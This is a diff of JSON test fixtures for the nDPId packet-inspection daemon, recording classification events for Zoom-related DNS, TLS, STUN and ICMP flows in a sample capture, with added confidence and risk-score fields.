+00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569520468958,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.238"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468959,"flow_last_seen":1569520468959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520468959,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569520468959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520468959,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOPAqAF1NMo+7tZQAbuf1vAbAAAAALAC\/\/+Z4QAAAgQFtAEDAwUBAQgKJZzZqwAAAAAEAgAA"}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569520469036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"ts_msec":1569520469036,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAzKPoAAP8RDvnAqAF1wKgBAf9yADUAH9x7wYgBAAABAAAAAAAABWxvY2FsAAAGAAE="}
-00720{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569520469067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520469067,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVu40yj7uwKgBdQG71lCVbT6Un9bwHIASaQOUKgAAAgQFrAEBBAIBAwMM"}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569520469067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1569520469067,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBPvAqAF1NMo+7tZQAbuf1vAclW0+lVAQIAAd\/QAA"}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569520469072,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"ts_msec":1569520469072,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB+D5oAADcR8A7AqAEBwKgBdQA1\/3IAaoTewYiBgwABAAAAAQAABWxvY2FsAAAGAAEAAAYAAQAACY8AQAFhDHJvb3Qtc2VydmVycwNuZXQABW5zdGxkDHZlcmlzaWduLWdycwNjb20AeFjoeAAABwgAAAOEAAk6gAABUYA="}
-00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00538{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569520469072,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1569520469072,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4d+0AAEABfxHAqAF1wKgBAQMD\/OoAAAAARQAAfg+aAAA3EfAOwKgBAcCoAXUANf9yAGoAAA=="}
-00590{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.637537}
+00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.637537}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469081,"flow_last_seen":1569520469081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569520469081,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569520469081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1569520469081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAog\/0AAEAG0h7AqAF1DeFUttYOAbuSOQajVAdu1VAQECZHdwAA"}
-00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1569520469116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAAoaEVAAO8G\/tUN4VS2wKgBdQG71g5UB27VAAAAAFAEAADwhQAAAAAAAAAA"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469189,"flow_last_seen":1569520469189,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569520469189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABICu4AAEAR5YzAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569520469200,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469200,"pkt":"EBMx8Tl2KDc3AG3ICABFAABISukAAEARpZHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
-00861{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01186{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
+00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569520469210,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469210,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIjkkAAEARYjHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569520469189,"flow_last_seen":1569520469210,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469210,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569520469189,"flow_last_seen":1569520469210,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469210,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569520469221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469221,"pkt":"EBMx8Tl2KDc3AG3ICABFAABI9l0AAEAR+RzAqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569520469231,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469231,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIQ9kAAEARq6HAqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569520469242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469242,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIKAsAAEARx2\/AqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569520469253,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469253,"pkt":"EBMx8Tl2KDc3AG3ICABFAABI+hMAAEAR9WbAqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
